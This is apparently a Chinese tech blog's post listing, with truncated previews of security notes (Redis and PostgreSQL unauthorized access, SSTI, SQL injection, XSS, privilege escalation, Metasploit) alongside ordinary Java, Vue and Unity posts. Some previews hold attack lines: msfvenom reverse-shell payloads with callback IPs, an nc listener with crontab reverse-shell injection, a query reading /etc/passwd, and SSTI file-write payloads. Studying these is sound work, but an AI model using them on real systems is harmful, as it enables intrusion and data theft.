- 博客(33)
- 收藏
- 关注
RSS订阅原创 【我的收集】
1.Windows命令2.安全加固3.windows系统排查4.linux系统排查5.linux日志6.webshell特征7.FastJson反序列化8.分析,研判9.Shiro 550 反序列化10.Log4j11.挖矿木马查杀12.shiro权限绕过12.沙箱逃逸1. Windows日志:C:\Windows\System32\winevt\Logs 命令:Eventvwr.msc2.安全加固(1)禁用或者删除无用的账号,检查特殊账户(可远程登录、用户权限高的账号),必
2022-05-21 21:52:06
899
1
原创 烂土豆+令牌窃取提权
烂土豆+令牌窃取提权(win2008及之前可以直接使用令牌窃取提权)potato.exe:https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS16-075/potato.exe# 1.生成shell上传到目标主机msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.106.150 LPORT=4433 -f exe -o 4433.exe# 2.开启msfu
2022-04-03 19:58:25
200
原创 redis未授权访问
1.漏洞成因Redis没有设置密码Redis protected-mode 设置为noRedis以高权限启动2.漏洞防御限制redis访问:修改redis.conf文件bind 127.0.0.1修改默认端口:修改redis.conf文件增加redis访问密码3.漏洞利用1.反弹shell利用条件:以root权限运行时,通过写crontab来执行命令,反弹shell1.开启任意监听端口:nc -nvlp 99992.set xxx “\n\n*/1 * * * * /bin/b
2022-04-03 13:44:32
2182
原创 postgresql未授权访问
pyload:DROP TABLE if EXISTS wooyun;CREATE TABLE wooyun(t TEXT);COPY wooyun FROM '/etc/passwd';SELECT * FROM wooyun limit 1 offset 0;
2022-04-03 13:42:28
3583
原创 XSS漏洞
1.反射型漏洞产生原因和攻击方式:原因:对用户的输入不经过滤直接回显到页面中。方式:通过构造url,当用户访问该url时会重定向到钓鱼网站,或者窃取用户的cookie、发送其他请求。2.Xss防御:1)HTML转义,转义后可以确保用户输入的内容在浏览器中作为文本显示,而不是作为代码解析。htmlspecialchars()是PHP里面把预定义的字符转换为HTML实体的函数2)验证用户输入,过滤特殊标签和指定字符。3)输入做过滤,输出做转义3.过滤绕过的思路前端限制绕过,直接抓包重放,或者修改
2022-04-03 13:41:05
1575
原创 sql注入
1.注入攻击原理是什么?如何找注入点?如何判断注入点?原理:通过构建特殊输入作为参数传入web应用程序,通过执行注入的sql语句来达到获取sql权限的目的。注入点:一切与数据库产生交互的操作都可能是注入点。判断注入点:1.搜索框或URL尾端加’如果报错则可能存在sql注入漏洞2.数字型判断是否有注入and 1=1//返回正确页面and 1=2//返回错误页面3.字符型判断是否有注入and ‘1’='1//返回正确页面and '1='2//返回错误页面2.注入分为几类及提交方式是什么
2022-04-03 13:39:30
1925
原创 flask ssti
1.漏洞成因:2.漏洞防御:3.漏洞利用:subclasses()[59]:是找到重载过的__init__类(在获取初始化属性后,带wrapper的说明没有重载,寻找不带warpper的)(1)''.__class__.__mro__[2].__subclasses__()[40]("/root/桌面/test.txt", "a").write("123")(2)''.__class__.__mro__[2].__subclasses__([59].__init__.__globals__['_
2022-04-03 13:37:18
2173
原创 Csrf攻击
1.Csrf原理:1.对目标网站增删改的地方进行标记,并观察其逻辑,判断请求是否可以被伪造,比如修改管理员账号时,并不需要验证旧密码,导致请求容易被伪造;v比如对于敏感信息的修改并没有使用安全的token验证,导致请求容易被伪造。2.确认凭证的有效期(这个问题会提高CSRF利用的概率)3.虽然退出或者关闭了浏览器,但cookie仍然有效,或者session并没有及时过期,导致CSRF攻击变的简单2.防御CSRF攻击:验证token:form 的最后加上 验证HTTP请求的Referer,还有验
2022-04-03 13:32:07
183
原创 metasploit基本使用
1.基于tcp的主机信息收集(1)use arp_sweep(2)db_nmap(3)Tcp协议半连接扫描synuse portscan/syn(4)密码嗅探Sniffer/psnuffle2.基于snmp协议的信息收集(1) snmp_enum 需/etc/default/snmpd中开启全部ip访问 0.0.0.0/03.生成反弹shellmsfvenom -p windows/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=
2022-04-03 13:30:40
3439
原创 mybatis 实现分页功能
实现分页功能1.创建Page实体类package com.yao.utils;import lombok.AllArgsConstructor;import lombok.Data;import lombok.NoArgsConstructor;import java.util.List;@Data@NoArgsConstructor@AllArgsConstructorpublic class Page<T> { private int page;//分页起始
2021-12-08 11:15:01
347
原创 vue的初始化
vue的初始化####- 1.安装node.js####- 2.安装cnpm配置国内源npm install -g cnpm --registry==https://registry.npm.taobao.org####- 3.安装vue-clicnpm install -g @vue/cli####- 4.使用vue-cli创建vue项目vue create vue-project####- 5.引入element-uielement-ui入门 cnpm i element-ui -S
2021-12-08 11:14:25
484
原创 搭建hadoop-Linux集群
搭建hadoop-Linux集群复制多台虚拟机,将其mac地址改为不同的vi etc/udev/rules/70- 修改其中mac地址关闭防火墙systemctl stop firewalld实现ssh免密登录#产生ssh公钥和私钥ssh-keygen -t rsa#将公钥发往一台主机sshd-copy-id 192.168.106.141(自己的主节点ip)#通过scp命令将公钥复制到其它的主机scp root/.ssh/authorized_keys 192.168
2021-12-08 11:13:51
1413
原创 SpringBoot整合Shiro
SpringBoot整合Shiro(注意)shiro和SpringSecurity不能共用,SpringSecurity优先级高1.导入依赖<dependency> <groupId>org.apache.shiro</groupId> <artifactId>shiro-core</artifactId> <version>1.7.1</version
2021-12-08 11:10:45
71
原创 SpringBoot拦截器
SpringBoot拦截器1.实现HandlerInterceptor接口2.重写preHandle方法实现代码public class LoginHandler implements HandlerInterceptor { @Override public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
2021-12-08 11:10:09
53
原创 SpringSecrity
#SpringSecrity1.导入依赖 <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-security</artifactId> </dependency> <dependency>
2021-12-08 11:08:41
95
原创 SpringBoot整合Mybatis
SpringBoot整合Mybatis1.导入依赖<dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-jdbc</artifactId></dependency><dependency> <groupId>org.mybatis.spring.boot</groupId
2021-12-07 19:14:50
45
原创 spring基础使用
ApplicationContext.xmlSpring使用方法<?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:p="http://www.springframework.org/schema/
2021-12-07 19:14:28
149
原创 三种引入Mapper
三种引入Mapper方式<mapper resource="com/yao/dao/userMapper.xml"/><mapper class="com.yao.dao.userMapper.xml"/> <!--Mapper接口必须实现xml同名--><mapper package="com.yao.dao"/><!--Mapper接口必须实现xml同名-->...
2021-12-07 19:13:41
382
原创 一.mybatis的使用
一.使用mybatis1.编写mybatis-config.xml<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE configuration PUBLIC "-//mybatis.org//DTD Config 3.0//EN" "http://mybatis.org/dtd/mybatis-3-config.dtd"><configuration> <!-- 属性优化
2021-12-07 19:12:44
58
原创 KMP算法
KMP算法1.求next数组 static void getNext(int next[], String p) { int pLen = p.length(); next[0] = -1; int k = -1; int j = 0; while (j < pLen - 1) { //p[k]表示前缀,p[j]表示后缀 if (k == -1 |
2021-12-07 19:12:16
144
原创 反转链表实现
反转链表一.双链表法[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Kc0p7m4S-1638875374408)(/static/img/reverseLinkList.png “反转链表”)]代码实现 public ListNode reverseList(ListNode head) { ListNode newnode=null; while(head!=null) { ListN
2021-12-07 19:11:39
489
原创 int和Integer的区别
int和Integer的区别1、Integer是int的包装类,int则是java的一种基本数据类型2、Integer变量必须实例化后才能使用,而int变量不需要3、Integer实际是对象的引用,当new一个Integer时,实际上是生成一个指针指向此对象;而int则是直接存储数据值4、Integer的默认值是null,int的默认值是0...
2021-12-07 19:09:24
130
原创 java对象转json
java对象转json一,jackson<!-- https://mvnrepository.com/artifact/org.projectlombok/lombok --><dependency> <groupId>org.projectlombok</groupId> <artifactId>lombok</artifactId> <version>1.18.20</version&
2021-12-07 19:08:42
62
原创 Docker安装与基本使用
Docker安装与基本使用一.安装1.点击下载Docker下载器2.开启Hyper-vHYPER-V 是微软开发的虚拟机,类似于 VMWARE 或 VIRTUALBOX,仅适用于 WINDOWS 10。这是 DOCKER DESKTOP FOR WINDOWS 所使用的虚拟机。这个虚拟机一旦启用,QEMU、VirtualBox 或 VMWare Workstation 15 及以下版本将无法使用。命令行输入开启:Enable-WindowsOptionalFeature -Online -Feat
2021-12-07 19:07:53
42
原创 代码上传到github
上传项目到github1.在要上传的文件下执行git init2.在django项目的根文件夹中创建一个文件.gitignore。并将以下代码放入其中。*.pyc*~__pycache__myvenvdb.sqlite3/static.DS_Store3.使用以下命令检查git的状态。它为屏幕提供了一些细节。git status4.执行以下命令,全部添加git add --allgit commit -m "my app first commit"4.首先登录git帐
2021-12-07 19:06:29
67
原创 unity 朝着一个方向旋转
方向转为浮点数(来源:CodeMonkey插件) float GetAngleFromVectorFloat(Vector3 dir) { dir = dir.normalized; float n = Mathf.Atan2(dir.y, dir.x) * Mathf.Rad2Deg; if (n < 0) n += 360; return n; //用法: tranform.eulerAngles=ne
2020-12-09 16:00:19
429
原创 游戏开发之路 二
开发Demo 一1.角色功能① 朝着鼠标点击方向转动:(Done) Vector3 Move_Player(){ Ray ray = Camera.main.ScreenPointToRay(Input.mousePosition); RaycastHit hitInfo; if(Physics.Raycast(ray, out hitInfo, 200, whatIsGround)){ Vector3 target =
2020-12-09 15:45:49
85
原创 unity游戏开发学习之路一
c#游戏开发实战一-------角色移动脚本using System.Collections;using System.Collections.Generic;using UnityEngine;public class runing : MonoBehaviour{ //定义变量 private Animator animationer;//调取对象的动画组件 private Rigidbody2D HeroRd;//调取对象的刚体,用于移动对象 private
2020-09-20 12:57:25
80
原创 使用pyhton+adb实现自动公主连结闯关
这里介绍如何使用pyhton+adb实现自动公主连结闯关此教程需要安装python和adb,相关知识请百度搜索python环境一般电脑自带这里是adb安装教程一.用usb链接自己的手机1.打开cmd2.输入 adb devices出现以上为链接正常二.运行代码1.打开python环境如果没有接触过python的小伙伴可以在电脑搜索栏输入idle,然后ctrl+n新建2.粘贴以下代码这是公主连结第三章的代码import osimport timeimport randome=
2020-05-21 09:50:32
1482
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人